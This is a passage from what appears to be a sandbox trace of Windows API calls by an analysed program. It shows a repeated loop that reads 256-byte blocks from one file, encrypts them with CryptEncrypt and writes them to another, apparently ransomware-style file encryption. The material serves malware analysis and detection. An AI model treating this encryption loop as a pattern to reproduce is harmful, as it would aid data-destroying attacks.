nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.177] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.177] GetLastError () returned 0x0 [0168.177] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.177] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.177] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.178] GetLastError () returned 0x0 [0168.178] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.178] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.178] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.178] GetLastError () returned 0x0 [0168.178] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.178] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.178] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.178] GetLastError () returned 0x0 [0168.178] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.178] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.178] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.178] GetLastError () returned 0x0 [0168.178] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.178] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.178] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.178] GetLastError () returned 0x0 [0168.178] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.178] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.178] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.178] GetLastError () returned 0x0 [0168.178] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.178] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.178] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.178] GetLastError () returned 0x0 [0168.178] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.179] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.179] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.179] GetLastError () returned 0x0 [0168.179] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.179] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.179] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.179] GetLastError () returned 0x0 [0168.179] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.179] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.179] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.179] GetLastError () returned 0x0 [0168.179] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.179] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.179] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.179] GetLastError () returned 0x0 [0168.179] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.179] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.179] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.179] GetLastError () returned 0x0 [0168.179] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.179] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.179] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.179] GetLastError () returned 0x0 [0168.179] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.180] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.180] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.180] GetLastError () returned 0x0 [0168.180] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.180] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.180] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.180] GetLastError () returned 0x0 [0168.180] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.180] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.180] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.180] GetLastError () returned 0x0 [0168.180] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.180] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.180] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.180] GetLastError () returned 0x0 [0168.180] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.180] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.180] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.180] GetLastError () returned 0x0 [0168.180] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.180] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.180] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.180] GetLastError () returned 0x0 [0168.180] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.180] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.180] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.181] GetLastError () returned 0x0 [0168.181] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.181] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.181] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.181] GetLastError () returned 0x0 [0168.181] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.181] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.181] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.181] GetLastError () returned 0x0 [0168.181] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.181] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.181] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.181] GetLastError () returned 0x0 [0168.181] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.181] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.181] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.181] GetLastError () returned 0x0 [0168.181] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.181] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.181] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.181] GetLastError () returned 0x0 [0168.181] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.181] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.181] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.181] GetLastError () returned 0x0 [0168.182] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.182] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.182] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.182] GetLastError () returned 0x0 [0168.182] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.182] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.182] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.182] GetLastError () returned 0x0 [0168.182] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.182] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.182] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.182] GetLastError () returned 0x0 [0168.182] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.182] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.182] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.182] GetLastError () returned 0x0 [0168.182] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.182] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.182] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.182] GetLastError () returned 0x0 [0168.182] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.182] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, 